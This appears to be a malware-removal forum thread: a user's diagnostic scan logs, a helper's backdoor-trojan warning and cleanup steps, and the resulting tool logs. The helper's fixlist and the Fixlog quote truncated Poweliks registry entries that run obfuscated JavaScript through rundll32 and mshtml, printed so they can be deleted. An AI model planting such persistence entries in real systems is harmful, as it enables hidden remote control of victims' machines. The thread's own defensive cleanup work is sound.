Task: {507AECB2-D0F2-4D71-BD55-415773FB1B97} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {55E5EB09-AE70-498C-A24B-D26937F9D814} - System32\Tasks\avast! Emergency Update => C:\Security\Avast\AvastEmUpdate.exe [2014-11-28] (AVAST Software)
Task: {5C4E1165-A03D-4F43-AA8A-ABBAF628D776} - System32\Tasks\{35B60B70-4266-4184-BD6D-ED6C120FF22F} => C:\Program Files (x86)\AOL Desktop 9.7\aol.exe [2013-09-07] (AOL Inc.)
Task: {5D4D75AD-8BFA-40CC-AC17-873EEC33C093} - System32\Tasks\{BF979F2A-7CB1-4662-B2A0-C69F9D2F7550} => C:\Program Files (x86)\AOL Desktop 9.7a\aol.exe [2014-08-19] (AOL Inc.)
Task: {9500462C-E33E-4CBA-B436-F45304D8AED4} - System32\Tasks\{81263530-85AE-4864-B764-AA1E9FF3287F} => C:\Security\cCleaner\CCleaner64.exe
Task: {9576B138-BCC3-4782-8921-AB01DD89822A} - System32\Tasks\{0AC9BC12-31DC-477D-845E-F832A8791205} => C:\Program Files (x86)\AOL Desktop 9.7\aol.exe [2013-09-07] (AOL Inc.)
Task: {9C4D9481-CBF5-42CA-89B0-051F5768F3DF} - System32\Tasks\{097B2FE1-BE8F-433B-BE14-E0A3631F37B5} => C:\Security\cCleaner\CCleaner64.exe
Task: {A7FCA671-FB6B-45B6-A325-48CDFD18CC0C} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-12-10] (Adobe Systems Incorporated)
Task: {B4064A4C-0952-4117-852E-034637C834A8} - System32\Tasks\{8EAF3A06-9E86-4371-BB39-45AD86DD93E5} => K:\LaCie Setup.exe
Task: {BFDE29E6-7B48-4574-B703-0CBE3D8DD1F7} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\My Dell\uaclauncher.exe [2014-01-31] (PC-Doctor, Inc.)
Task: {C29C119A-C76D-4616-AC43-7C28CD239D8A} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\My Dell\sessionchecker.exe [2014-01-31] (PC-Doctor, Inc.)
Task: {C7B76AB8-4D13-4701-A99B-4CA0279A2533} - System32\Tasks\{68BD5DEF-AE9A-420D-8122-D60EB3894EE7} => C:\Security\cCleaner\CCleaner64.exe
Task: {C82BF3FE-92CF-4B06-A490-DA140838B54D} - System32\Tasks\GBM - New Backup Job-Incremental => C:\Program Files\Genie9\Genie Backup Manager\GBM.EXE [2012-06-04] (Genie9)
Task: {CD903411-568D-413C-A7D2-BD3D8D164C35} - System32\Tasks\{6F55B369-8B75-46DB-9049-1A3AE86A64F4} => C:\Security\cCleaner\CCleaner64.exe
Task: {D77626FE-7F65-4E7B-8C31-1C4884452045} - System32\Tasks\AdobeAAMUpdater-1.0-anonymous-PC-anonymous => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2012-09-20] (Adobe Systems Incorporated)
Task: {D9D526DC-E912-4EC2-924E-B3536822DA7B} - System32\Tasks\OfficeSoftwareProtectionPlatform\SvcRestartTask => Sc.exe start osppsvc
Task: {E014BA73-9877-4E43-BDAD-8AEF946D1F5C} - System32\Tasks\{D5D4FC32-E4BE-4061-B943-A2EEC9421BEE} => C:\Security\cCleaner\CCleaner64.exe
Task: {E19FA8D9-8402-47C1-A65C-694DC75F8406} - System32\Tasks\{BEE4D21A-3DA1-4660-94A2-B11FFD5286E1} => K:\LaCie Setup.exe
Task: {F5C581FF-ADC9-461C-8299-E937A9A1740F} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon => c:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\Bootstrap.exe [2011-11-25] (Intel Corporation)
Task: {FF159092-D231-4085-8494-B7AAABA28727} - System32\Tasks\{3C7BA379-F2FA-427C-B3EB-0701A5E7CFF9} => K:\LaCie Setup.exe
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GBM - New Backup Job-Full.job => C:\Program Files\Genie9\Genie Backup Manager\GBM.EXE
Task: C:\Windows\Tasks\GBM - New Backup Job-Incremental.job => C:\Program Files\Genie9\Genie Backup Manager\GBM.EXE
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon.job => c:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\Bootstrap.exe
Task: C:\Windows\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d.job => c:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\Bootstrap.exe

==================== Loaded Modules (whitelisted) =============

2012-05-21 02:17 - 2012-05-21 02:17 - 00261632 ____N () C:\Program Files\Genie9\Genie Backup Manager\GSLogging.dll
2012-05-21 02:19 - 2012-05-21 02:19 - 00250368 ____N () C:\Program Files\Genie9\Genie Backup Manager\gs_encryption.dll
2012-01-20 04:13 - 2012-01-20 04:13 - 00369152 ____N () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
2011-11-09 09:55 - 2011-11-09 09:55 - 00016384 ____N () c:\Program Files (x86)\ATI Technologies\ATI.ACE\Branding\Branding.dll
2012-06-28 07:44 - 2012-01-21 11:35 - 00128280 ____N () C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe
2012-06-28 07:50 - 2012-01-26 21:49 - 02751808 ____N () C:\Program Files (x86)\Dell DataSafe Local Backup\COMPONENTS\SCHEDULER\STSERVICE.EXE
2014-11-28 19:11 - 2014-11-28 19:11 - 00388208 ____N () C:\Security\Avast\ng\vbox\VBoxDDU.dll
2014-11-28 19:11 - 2014-11-28 19:11 - 05851328 ____N () C:\Security\Avast\ng\vbox\VBoxRT.dll
2014-12-30 17:14 - 2014-12-30 17:14 - 02908160 _____ () C:\Security\Avast\defs\14123001\algo.dll
2014-11-28 19:11 - 2014-11-28 19:11 - 04495336 ____N () C:\Security\Avast\ng\vbox\x86\VBoxRT-x86.dll
2015-01-02 15:43 - 2015-01-02 15:43 - 02909696 _____ () C:\Security\Avast\defs\15010201\algo.dll
2014-01-20 13:17 - 2014-01-20 13:17 - 00073544 ____N () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-10-11 12:05 - 2014-10-11 12:05 - 01044776 ____N () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2010-12-11 16:23 - 2010-12-11 16:23 - 00279904 ____N () C:\Program Files (x86)\Acronis\TrueImageHome\Common\resource.dll
2010-12-11 15:09 - 2010-12-11 15:09 - 00019808 ____N () C:\Program Files (x86)\Acronis\TrueImageHome\Common\thread_pool.dll
2010-12-11 15:10 - 2010-12-11 15:10 - 00028512 ____N () C:\Program Files (x86)\Acronis\TrueImageHome\Common\rpc_client.dll
2014-11-28 19:11 - 2014-11-28 19:11 - 38562088 ____N () C:\Security\Avast\libcef.dll
2014-10-17 02:26 - 2014-10-17 02:26 - 00172032 ____N () C:\Windows\assembly\NativeImages_v2.0.50727_32\IsdiInterop\92a1650dbe9fad5f46633b835420e1a8\IsdiInterop.ni.dll
2012-06-28 07:42 - 2011-11-29 20:00 - 00059392 ____N () C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IsdiInterop.dll
2012-06-28 07:44 - 2012-01-21 06:23 - 01198872 ____N () C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\ACE.dll

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist => ""="Service"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

HKU\S-1-5-21-3319101212-3949270613-1064135436-1001\Software\Classes\.exe:  =>  <===== ATTENTION!

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

MSCONFIG\Services: NAUpdate => 2

========================= Accounts: ==========================

Administrator (S-1-5-21-3319101212-3949270613-1064135436-500 - Administrator - Disabled)
anonymous (S-1-5-21-3319101212-3949270613-1064135436-1001 - Administrator - Enabled) => C:\Users\anonymous
Guest (S-1-5-21-3319101212-3949270613-1064135436-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3319101212-3949270613-1064135436-1002 - Limited - Enabled)

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (01/02/2015 03:42:45 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: BtvStack.exe, version: 7.4.0.115, time stamp: 0x4efc32fa
Faulting module name: BtvStack.exe, version: 7.4.0.115, time stamp: 0x4efc32fa
Exception code: 0xc0000005
Fault offset: 0x000000000007c618
Faulting process id: 0xb28
Faulting application start time: 0xBtvStack.exe0
Faulting application path: BtvStack.exe1
Faulting module path: BtvStack.exe2
Report Id: BtvStack.exe3

Error: (01/02/2015 03:42:42 PM) (Source: Windows Search Service) (EventID: 7042) (User: )
Description: The Windows Search Service is being stopped because there is a problem with the indexer: The catalog is corrupt.


Details:
    The content index catalog is corrupt.  (HRESULT : 0xc0041801) (0xc0041801)

Error: (01/02/2015 03:42:42 PM) (Source: Windows Search Service) (EventID: 7010) (User: )
Description: The index cannot be initialized.


Details:
    The content index catalog is corrupt.  (HRESULT : 0xc0041801) (0xc0041801)

Error: (01/02/2015 03:42:42 PM) (Source: Windows Search Service) (EventID: 3058) (User: )
Description: The application cannot be initialized.

Context: Windows Application


Details:
    The content index catalog is corrupt.  (HRESULT : 0xc0041801) (0xc0041801)

Error: (01/02/2015 03:42:42 PM) (Source: Windows Search Service) (EventID: 3028) (User: )
Description: The gatherer object cannot be initialized.

Context: Windows Application, SystemIndex Catalog


Details:
    The content index catalog is corrupt.  (HRESULT : 0xc0041801) (0xc0041801)

Error: (01/02/2015 03:42:42 PM) (Source: Windows Search Service) (EventID: 3029) (User: )
Description: The plug-in in <Search.TripoliIndexer> cannot be initialized.

Context: Windows Application, SystemIndex Catalog


Details:
    Element not found.  (HRESULT : 0x80070490) (0x80070490)

Error: (01/02/2015 03:42:37 PM) (Source: Windows Search Service) (EventID: 3029) (User: )
Description: The plug-in in <Search.JetPropStore> cannot be initialized.

Context: Windows Application, SystemIndex Catalog


Details:
    The content index catalog is corrupt.  (HRESULT : 0xc0041801) (0xc0041801)

Error: (01/02/2015 03:42:37 PM) (Source: Windows Search Service) (EventID: 9002) (User: )
Description: The Windows Search Service cannot load the property store information.

Context: Windows Application, SystemIndex Catalog


Details:
    The content index server cannot update or access information because of a database error.  Stop and restart the search service.  If the problem persists, reset and recrawl the content index.  In some cases it may be necessary to delete and recreate the content index.  (HRESULT : 0x8004117f) (0x8004117f)

Error: (01/02/2015 03:42:37 PM) (Source: Windows Search Service) (EventID: 7040) (User: )
Description: The search service has detected corrupted data files in the index {id=1100}. The service will attempt to automatically correct this problem by rebuilding the index.


Details:
    The content index catalog is corrupt.  (HRESULT : 0xc0041801) (0xc0041801)

Error: (01/02/2015 03:42:37 PM) (Source: Windows Search Service) (EventID: 9000) (User: )
Description: The Windows Search Service cannot open the Jet property store.


Details:
    0x%08x (0x8004117f - The content index server cannot update or access information because of a database error.  Stop and restart the search service.  If the problem persists, reset and recrawl the content index.  In some cases it may be necessary to delete and recreate the content index.  (HRESULT : 0x8004117f))


System errors:
=============
Error: (01/02/2015 03:44:26 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Dell Digital Delivery Service service terminated unexpectedly.  It has done this 1 time(s).

Error: (01/02/2015 03:42:42 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Search service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 30000 milliseconds: Restart the service.

Error: (01/02/2015 03:42:42 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: The Windows Search service terminated with service-specific error %%-1073473535.

Error: (01/02/2015 03:42:10 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (01/02/2015 03:42:09 PM) (Source: Microsoft-Windows-BitLocker-Driver) (EventID: 24620) (User: NT AUTHORITY)
Description: Encrypted volume check: Volume information on  cannot be read.

Error: (01/02/2015 03:42:02 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Garmin Core Update Service service failed to start due to the following error:
%%1053

Error: (01/02/2015 03:42:02 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Garmin Core Update Service service to connect.

Error: (12/30/2014 05:18:08 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (12/30/2014 05:17:41 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Network List Service service depends on the Network Location Awareness service which failed to start because of the following error:
%%1068

Error: (12/30/2014 05:17:41 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Network List Service service depends on the Network Location Awareness service which failed to start because of the following error:
%%1068


Microsoft Office Sessions:
=========================
Error: (01/02/2015 03:42:45 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: BtvStack.exe7.4.0.1154efc32faBtvStack.exe7.4.0.1154efc32fac0000005000000000007c618b2801d026cc8015382aC:\Program Files (x86)\Dell Wireless\Bluetooth Suite\BtvStack.exeC:\Program Files (x86)\Dell Wireless\Bluetooth Suite\BtvStack.exee72ff7d1-92bf-11e4-97f2-e006e62fa10a

Error: (01/02/2015 03:42:42 PM) (Source: Windows Search Service) (EventID: 7042) (User: )
Description:
Details:
    The content index catalog is corrupt.  (HRESULT : 0xc0041801) (0xc0041801)
The catalog is corrupt

Error: (01/02/2015 03:42:42 PM) (Source: Windows Search Service) (EventID: 7010) (User: )
Description:
Details:
    The content index catalog is corrupt.  (HRESULT : 0xc0041801) (0xc0041801)

Error: (01/02/2015 03:42:42 PM) (Source: Windows Search Service) (EventID: 3058) (User: )
Description: Context: Windows Application


Details:
    The content index catalog is corrupt.  (HRESULT : 0xc0041801) (0xc0041801)

Error: (01/02/2015 03:42:42 PM) (Source: Windows Search Service) (EventID: 3028) (User: )
Description: Context: Windows Application, SystemIndex Catalog


Details:
    The content index catalog is corrupt.  (HRESULT : 0xc0041801) (0xc0041801)

Error: (01/02/2015 03:42:42 PM) (Source: Windows Search Service) (EventID: 3029) (User: )
Description: Context: Windows Application, SystemIndex Catalog


Details:
    Element not found.  (HRESULT : 0x80070490) (0x80070490)
Search.TripoliIndexer

Error: (01/02/2015 03:42:37 PM) (Source: Windows Search Service) (EventID: 3029) (User: )
Description: Context: Windows Application, SystemIndex Catalog


Details:
    The content index catalog is corrupt.  (HRESULT : 0xc0041801) (0xc0041801)
Search.JetPropStore

Error: (01/02/2015 03:42:37 PM) (Source: Windows Search Service) (EventID: 9002) (User: )
Description: Context: Windows Application, SystemIndex Catalog


Details:
    The content index server cannot update or access information because of a database error.  Stop and restart the search service.  If the problem persists, reset and recrawl the content index.  In some cases it may be necessary to delete and recreate the content index.  (HRESULT : 0x8004117f) (0x8004117f)

Error: (01/02/2015 03:42:37 PM) (Source: Windows Search Service) (EventID: 7040) (User: )
Description:
Details:
    The content index catalog is corrupt.  (HRESULT : 0xc0041801) (0xc0041801)
1100

Error: (01/02/2015 03:42:37 PM) (Source: Windows Search Service) (EventID: 9000) (User: )
Description:
Details:
    0x%08x (0x8004117f - The content index server cannot update or access information because of a database error.  Stop and restart the search service.  If the problem persists, reset and recrawl the content index.  In some cases it may be necessary to delete and recreate the content index.  (HRESULT : 0x8004117f))


==================== Memory info ===========================

Processor: Intel® Core™ i7-3770 CPU @ 3.40GHz
Percentage of memory in use: 52%
Total physical RAM: 12248.9 MB
Available physical RAM: 5854.68 MB
Total Pagefile: 24495.98 MB
Available Pagefile: 16888.28 MB
Total Virtual: 8192 MB
Available Virtual: 8191.81 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:1850.72 GB) (Free:1515.79 GB) NTFS
Drive j: (LaCie) (Fixed) (Total:1863.01 GB) (Free:709.15 GB) NTFS
Drive l: () (Removable) (Total:14.9 GB) (Free:11.38 GB) FAT32

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 1863 GB) (Disk ID: A97102A7)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=12.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=1850.7 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows XP) (Size: 1863 GB) (Disk ID: FC02E086)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)

========================================================
Disk: 6 (Size: 14.9 GB) (Disk ID: 431EBE56)
Partition 1: (Not Active) - (Size=14.9 GB) - (Type=0C)

==================== End Of Log ============================

 

 

 

 

 



#7 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 38,196 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:08:28 AM

Posted 02 January 2015 - 04:17 PM

Greetings,

Thanks for the information. While I review it please complete the below then see if you can attach the file.

===================================================

Managing Attachments

----------
  • Navigate to the top of this post
  • In the upper right hand corner you will see your screen name
  • Left click on that and a drop down list will appear
  • Select My Settings
  • On the left hand side under General Settings click on Manage Attachments
  • To the very right on the blue bar just above the first entry click on the open check box
  • All of the checkboxes should now be checked
  • Click Delete Selected
  • You should now see You have used 0bytes of 250K

Edited by Oh My!, 02 January 2015 - 04:35 PM.

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"For unto us a Child is born, Unto us a Son is given;"

#8 Oh My!

Posted 02 January 2015 - 04:40 PM

Thanks for your patience. Please be sure to see my previous post regarding how to manage Attachments.

I have a step for you to take but I must first advise you of the following.

===================================================

BACKDOOR WARNING!

--------------------

One or more of the identified infections is a Backdoor Trojan.

This allows hackers to remotely control your computer, steal critical system information and download and execute files.

I would counsel you to disconnect this PC from the Internet immediately. If you do any banking or other financial transactions on the PC or if it should contain any other sensitive information, please get to a known clean computer and change all passwords where applicable. Please let me know if you have already noticed evidences of financial institution irregularities. Those accounts should be monitored from this point forward.

Though the trojan has been identified and can be killed, because of its backdoor functionality, your PC is very likely compromised and there is no way to be sure your computer can ever again be trusted. Many experts in the security community believe that once infected with this type of trojan, the best course of action would be a reformat and reinstall of the OS. Please read these for more information:

How Do I Handle Possible Identify Theft, Internet Fraud and CC Fraud?
When Should I Format, How Should I Reinstall
 

Here are some thoughts I have put together for people who ask what they should do in light of the infection. Ultimately each user must decide for themselves what to do and the below are things you might want to consider.

It is necessary for us to at least make you aware of the worst-case scenario. This is because of the potential Backdoor Trojans bring with them, but it is not a determination on our part that your situation currently falls within this worst-case scenario.

Ultimately it is a personal decision whether to reformat or not. What decision should you make to let you sleep well at night? It is different for different people. I will say whether rightly or wrongly most people decide to clean and not reformat, at least initially.

The only insight I can offer is how I evaluate the issue personally even though I have never had a Backdoor Trojan on my computer. One of the primary purposes for malicious software is to somehow separate you from your money. It seems reasonable to assume that a thief trying to take your money via a Backdoor Trojan will hit you hard, and quickly. Once your computer starts to act up and you become suspicious you have the opportunity to eliminate access to your computer and change the information taken, namely account and password information. The key to this, in my opinion, is whether or not you have noticed any irregularities in your banking or other financial institutions, or things like email and social network accounts (i.e. Facebook). If you have not seen any evidence of that then you may question whether your information has truly been stolen. If it seems it hasn't, and your critical information has been changed, it is reasonable to be more confident you are safe but you must stop short of claiming an absolute guarantee.

If, after careful consideration you decide not to reformat your computer it would be wise to continue monitoring your sensitive data and don't wait to address future symptoms on your computer which seem to be malware related.

The bottom line, the only way to be absolutely sure to be rid of a Backdoor Trojan is to reformat. The decision is yours.

Oh My!


We can still clean this machine but I can't guarantee that it will be 100% secure afterwards. Let me know what you decide to do. If you decide to go through with the cleanup, please proceed with the following steps.

===================================================

Farbar's Recovery Scan Tool - Run Fix in Normal or Safe Mode

--------------------
  • Press the Windows key + r on your keyboard at the same time. Type in notepad and press Enter
  • Please copy and paste the contents of the below code box into the open notepad and save it to your desktop (<<<Important) as fixlist.txt
HKU\S-1-5-21-3319101212-3949270613-1064135436-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
CustomCLSID: HKU\S-1-5-21-3319101212-3949270613-1064135436-1001_Classes\CLSID\{4F8A6B95-6220-40e1-BAF6-4F2810B32428}\InprocServer32 -> C:\Audiovisual & Graphics\Thumbs Plus 8 SP1\Bin\cswshlex64.dll No File
CustomCLSID: HKU\S-1-5-21-3319101212-3949270613-1064135436-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?
HKU\S-1-5-21-3319101212-3949270613-1064135436-1001\Software\Classes\.exe:  =>  <===== ATTENTION!
  • Launch FRST and press the Fix button just once and wait, the program will automatically launch fixlist.txt.
  • The tool will create a log on the desktop called Fixlog.txt. Please copy and paste the contents of the file in your reply.
===================================================

AdwCleaner by Xplode - Delete Adware

-------------------
  • Please download AdwCleaner by Xplode onto your desktop.
  • Close all open programs and internet browser
  • Double click on AdwCleaner.exe, click Run, then select I agree if it appears
  • Click Scan
  • Once the scan has completed you will see Pending. Please uncheck elements you don't want to remove above the progress bar
  • Click on Clean
  • Confirm the cleaning and rebooting of your computer by clicking OK
  • Your computer will be rebooted automatically. A text file will open after the restart
  • Copy and paste the contents in your reply
  • You can also find the logfile at C:\AdwCleaner\AdwCleaner.txt
===================================================

Junkware Removal Tool by thisisu

-------------------
  • Please download Junkware Removal Tool and save it to your desktop.
  • Disable your AntiVirus and AntiSpyware applications, usually via a right click on the System Tray icon. They may otherwise interfere with our tools. (Click on this link to see a list of programs that should be disabled. The list is not all inclusive.)
  • Right-mouse click JRT.exe and select Run as administrator (Windows XP double click the icon)
  • Please allow the program time to run
  • Once completed a Notepad document will open on your desktop
  • Copy and paste the contents in your reply
===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it. :thumbsup2:
  • Fixlog
  • AdwCleaner log
  • Junkware log

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"For unto us a Child is born, Unto us a Son is given;"

#9 baabel


Posted 02 January 2015 - 05:13 PM

Attachments are cleared.

 

I now attach "Summary".

 

I choose to clean the computer and change the sensitive passwords.

 

All my communications with you have been on an old computer I use as a secondary.  While I was sending the logs to you a little while back the infected machine failed and rebooted again.  Most of the time the machine has failed & rebooted and is waiting for me to log in.  I have now unplugged it from the Internet.

 

I will now begin the steps you have given me.



#10 baabel


Posted 02 January 2015 - 05:53 PM

Here are the logs:

 

 

 

# AdwCleaner v4.106 - Report created 02/01/2015 at 17:27:19
# Updated 21/12/2014 by Xplode
# Database : 2015-01-01.1 [Live]
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : anonymous - ANONYMOUS-PC
# Running from : C:\Users\anonymous\Desktop\AdwCleaner.exe
# Option : Clean

***** [ Services ] *****


***** [ Files / Folders ] *****

Folder Deleted : C:\ProgramData\Yahoo! Companion

***** [ Scheduled Tasks ] *****


***** [ Shortcuts ] *****


***** [ Registry ] *****

Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{81017EA9-9AA8-4A6A-9734-7AF40E7D593F}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{D2CE3E00-F94A-4740-988E-03DC2F38C34F}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{8DCB7100-DF86-4384-8842-8FA844297B3F}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{D2CE3E00-F94A-4740-988E-03DC2F38C34F}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{D2CE3E00-F94A-4740-988E-03DC2F38C34F}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{8DCB7100-DF86-4384-8842-8FA844297B3F}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{D2CE3E00-F94A-4740-988E-03DC2F38C34F}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{8DCB7100-DF86-4384-8842-8FA844297B3F}
Value Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{8DCB7100-DF86-4384-8842-8FA844297B3F}]
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Yahoo! Toolbar
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Yahoo! Companion

***** [ Browsers ] *****

-\\ Internet Explorer v11.0.9600.17496


-\\ Mozilla Firefox v31.0 (x86 en-US)


*************************

AdwCleaner[R0].txt - [4171 octets] - [06/12/2014 14:30:51]
AdwCleaner[R1].txt - [890 octets] - [06/12/2014 14:34:31]
AdwCleaner[R2].txt - [2082 octets] - [02/01/2015 17:26:05]
AdwCleaner[S0].txt - [4200 octets] - [06/12/2014 14:32:27]
AdwCleaner[S1].txt - [2027 octets] - [02/01/2015 17:27:19]

########## EOF - C:\AdwCleaner\AdwCleaner[S1].txt - [2087 octets] ##########
 

 

 

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 02-01-2015
Ran by anonymous at 2015-01-02 17:21:31 Run:1
Running from C:\Users\anonymous\Desktop
Loaded Profile: anonymous (Available profiles: anonymous)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
HKU\S-1-5-21-3319101212-3949270613-1064135436-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
CustomCLSID: HKU\S-1-5-21-3319101212-3949270613-1064135436-1001_Classes\CLSID\{4F8A6B95-6220-40e1-BAF6-4F2810B32428}\InprocServer32 -> C:\Audiovisual & Graphics\Thumbs Plus 8 SP1\Bin\cswshlex64.dll No File
CustomCLSID: HKU\S-1-5-21-3319101212-3949270613-1064135436-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?
HKU\S-1-5-21-3319101212-3949270613-1064135436-1001\Software\Classes\.exe:  =>  <===== ATTENTION!
*****************

"HKU\S-1-5-21-3319101212-3949270613-1064135436-1001\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully.
"HKU\S-1-5-21-3319101212-3949270613-1064135436-1001\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
"HKU\S-1-5-21-3319101212-3949270613-1064135436-1001_Classes\CLSID\{4F8A6B95-6220-40e1-BAF6-4F2810B32428}" => Key deleted successfully.
HKU\S-1-5-21-3319101212-3949270613-1064135436-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} => Key not found.
"HKU\S-1-5-21-3319101212-3949270613-1064135436-1001\Software\Classes\.exe" => Key deleted successfully.

==== End of Fixlog 17:21:31 ====

 

 

 

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.4.1 (12.28.2014:1)
OS: Windows 7 Home Premium x64
Ran by anonymous on Fri 01/02/2015 at 17:42:02.02
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




~~~ Services



~~~ Registry Values



~~~ Registry Keys



~~~ Files



~~~ Folders

Successfully deleted: [Folder] "C:\ProgramData\pcdr"
Successfully deleted: [Folder] "C:\Users\anonymous\AppData\Roaming\pcdr"
Successfully deleted: [Empty Folder] C:\Users\anonymous\appdata\local\{060BC2F8-7380-417E-9E1A-11DAE8A2C08F}
Successfully deleted: [Empty Folder] C:\Users\anonymous\appdata\local\{13359790-78D6-43FA-9A8C-4957DD34740F}
Successfully deleted: [Empty Folder] C:\Users\anonymous\appdata\local\{21448678-1388-4EAF-90AA-B7AAF90BD80B}
Successfully deleted: [Empty Folder] C:\Users\anonymous\appdata\local\{4193A6EB-C587-4EFA-B5BD-A4A92CB87609}
Successfully deleted: [Empty Folder] C:\Users\anonymous\appdata\local\{57EC87D1-89AE-4B8C-9F53-961287DB75E6}



~~~ Event Viewer Logs were cleared





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Fri 01/02/2015 at 17:44:50.66
End of JRT log
